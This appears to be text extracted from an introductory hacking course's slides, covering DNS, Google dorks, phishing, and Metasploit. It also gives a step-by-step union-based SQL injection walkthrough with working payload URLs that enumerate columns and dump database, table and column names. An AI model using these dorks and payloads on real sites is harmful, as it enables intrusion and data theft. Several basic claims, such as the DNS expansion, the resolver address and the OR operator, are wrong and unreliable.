  • 20. How firewall works : outbound
  • 22. What is DNS? • DNS stands for Domain Name Server. • It was difficult to remember ip address for each websites, so it came into action. • It maintains table that contains domian names vs ip address columns in its database. • Used for translating domain names into their respective ip address. • Ex : facebook.com = 66.220.158.11 • Stores frequently used domains in its cache. • Ex : Google’s open DNS server : 4.2.2.2
  • 24. Google Hacking Founders of Google: Sergey Brin and Larry Page “Google Hacking” doesn’t mean “How to hack Google? ”. It is skill to extract valuable information from web with the help of special keywords called “GOOGLE DORKS” Main idea is to “Pick a vulnerability, find the site”.
  • 25. How Google works? • Google Bots : Bots are computer program that automatically browse the world wide web in some order. These are also called web crawlers, spiders, ants or robots. Google uses mainly two bots :  Crawlers : It traverses over the web following the links found on different pages. When it finds any new page, sends its link to spider.  Spiders : It is a robotic browser like program that downloads the web pages associated with the link send by crawlers. • Indexer : It dissects and sorts each word, images etc on the every web page downloaded by spiders. • The Database is a warehouse for storing the pages downloaded and processed. • Search Engine Results : Depending upon search keywords, it digs search results out of the database following an algorithm.
  • 26. Google : Server side Google bots Crawler finds new pages via • URL submission at http://google.com/addurl.html • Following different links present on each webpage. Spiders download these webpages on google servers
  • 28. Basics of Google Hacking + Forces the word to be searched +firefox , will bring up results that contains the word firefox. - Eliminates the word from search results -chrome, will bring up results that doesn’t contains word chrome “ ” delimiters for entire search phrases (not single words) “Internet Explorer" will return documents containing the phrase Internet Explorer . Single letter wildcard Krazzy.hack will search for words like krazzy@hack, krazzy2hack, krazzy- hack, krazzy_hack etc. * Single word wildcard hack * planet will search for words like hack the planet, hack for planet, hack all planet etc. | logical OR firefox|chrome will return documents containing either firefox or chrome but not both.
  • 29. Google query : keywords - I site Restricts the search within the specified domain. site:xyz.com will show all pages on xyz.com crawled by Google bots intitle restricts results to documents whose title contains the specified word intitle:fox fire will find all sites with the word fox in the title and fire in the text allintitle restricts results to documents whose title contains all the specified phrases allintitle:fox fire will find all sites with the words fox and fire in the title, so it's equivalent to intitle:fox intitle:fire inurl restricts the results to sites whose URL contains specified word inurl:hacker will find sites whose url contain word hacker. allinurl restricts results to sites whose URL contains all the specified phrases allinurl:hacker vs cracker will find the sites whose url contains hacker vs cracker filetype Filters search to specified filetypes filetype:pdf Google hacking will show all the pdf documents containing word Google hacking
  • 30. Google query : keywords -II link restricts results to sites containing links to the specified location link:www.google.com will return documents containing one or more links to www.google.com inanchor restricts results to sites containing anchored text with the specified word inanchor: backtrack will return documents that has fire as anchored text (not url) allintext restricts results to documents containing the specified phrase in the text only. allintext:“kevin Mitnik" will return documents which contain the phrase kevin Mitnik in their text only numrange restricts results to documents containing a number from the specified Range numrange:1-100 fire will return sites containing a number from 1 to 100 and the word fire. The same result can be achieved with 1..100 fire cache Shows cache version of URL cache:xyz.com will show how the site looked , the last time Google bots visited the site.
  • 31. Advanced Google Dorks • Inurl:view/index.shtml • Inurl:view/view.shtml
  • 32. System Hacking Where windows installs password Reset windows logon password Play with sticky keys OPHCRACK Make a folder System Hidden Enable/Disable USB devices Make Drives invisible Make a undeletable folder Trojans
  • 34. Email Hacking How to Trace sender of email Check if sender has opened your mail Get ip address of your friend on chat Secret Question…. Phishing – Yeah I got A fish ;-) Keyloggers – what the heck??
  • 35. Phishing Attacker convinces the victim to put their details on a fake page When Attacker enters their credentials on the form is stored on another log file And Victim is redirected to Original site.
  • 45. SQL Injection • What is Database? - Collection of logically related data - It is similar to Attendance register • Define Table ? - It combination of rows and columns • What is SQL ? - SQL stands for Structured Query Language. - Used to select the information from database
  • 46. Basic SQL queries Create a table • Create table users(name varchar2(30), email varchar(50), password varchar(30), address varchar2(100)); Extracting data from table • Select name, email, password from users; • Select * from users where email=‘xyz@abc.com’ AND password=‘s3cr3t’; • Select * from users order by name;
  • 47. Basics of SQL Injection • How to find a site that is vulnerable to sql injection attack? - Use Google dorks - Inurl:view_faculty.php?id= - Inurl:viz.php?id= - Inurl:list.php?id= - Use Vunerability scanner - Acutenix - W3af
  • 48. What happens in background?? • Check if site is vulnerable or not? - Ex : http://xyz.com/list.php?id=3 Select name, email, password from users where id =3; - Ex : http://xyz.com/list.php?id=3’ Select name, email, password from users where id =3’; THIS WILL GIVE AN ERROR MESSAGE, MEANS WE CAN DIRECTLY COMMUICATE WITH DATABASE !!
  • 49. So WHAT’s NEXT??? • We will try to find no of columns in the Table http://xyz.com/list.php?id=3+order+by+1--  Select name, email, password from users where id =3 order by 1-- - It will extract name, email, passowrd from users table and sort the contents by 1st column; So it will give you fresh original webpage.  Select name, email, password from users where id =3 order by 100— - It will extract name, email, passowrd from users table and sort the contents by 100th column; There isn’t any 100th column so it will give you error.
  • 50. Finding columns • So , we will increment ‘order by value by 1’ untill we get error http://xyz.com/list.php?id=3+order+by+1-- http://xyz.com/list.php?id=3+order+by+2-- http://xyz.com/list.php?id=3+order+by+3-- : : http://xyz.com/list.php?id=3+order+by+7-- The above query returns error , means there are 6 columns current table.
  • 51. Find the Vulnerable column • We select all the columns i.e from 1-6 http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6-- • Try to find the vulnerable column that will retuurn data http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6-- IT WILL RETURN THE NOS OF VULNERABLE COLUMN i.e 1,2,3,4,5 or 6.
  • 52. SQLi cont.. • Suppose it returns 2 and 6 http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6-- • Then we can fetch any information in database at these column nos http://xyz.com/list.php?id=- 3+union+all+select+1,@@version,3,4,5,database()-- This will return the version of database and name of database. SYSTEM VARIABLES @@version : Returns Version of database @@user : Returns the user Currently logged in @@database : Returns the name of database
  • 53. Information Schema • Most of the websites use Mysql Databases for storing their information. • MySQl has ‘INFORMATION_SCHEMA’ database which keeps record of all the schemas , tables and Columns in the server. • INFORMATION_SCHEMA.SCHEMATA stores shema details. • INFORMATION_SCHEMA.TABLES stores all the information regarding tables in the database. • INFORMATION_SCHEMA.COLUMNS stores information of all the columns in all the tables.
  • 54. SQLi Cont… • The below query will extract all the database in the current server. http://xyz.com/list.php?id=- 3+union+all+select+1,2,3,4,5,group_concat(schema _name) from information_schema.schemata— • Below code will extract all the tables in current db http://xyz.com/list.php?id=- 3+union+all+select+1,2,3,4,5,group_conact(table_n ame) from information_schema.tables—
  • 55. SQLi Cont… • Extract all the Columns from the current table http://xyz.com/list.php?id=- 3+union+all+select+1,2,3,4,5,group_conact(colu mn_name) from information_schema.columns where table_name=‘users’— • Extract all the
  • 56. Metasploit Framework • It is a framework to exploit the services found during Scanning Phase • You can create virus infected files .. Using this framework within a couple of minutes • After Breaking into the system, You can set backdoor, download files , upload files, disable mouse, disable keyboard…and lots more • We have provided a detailed full length HD video tutorial in the DVD and a ebook
  • 57. Metasploit – The Pentesters Guide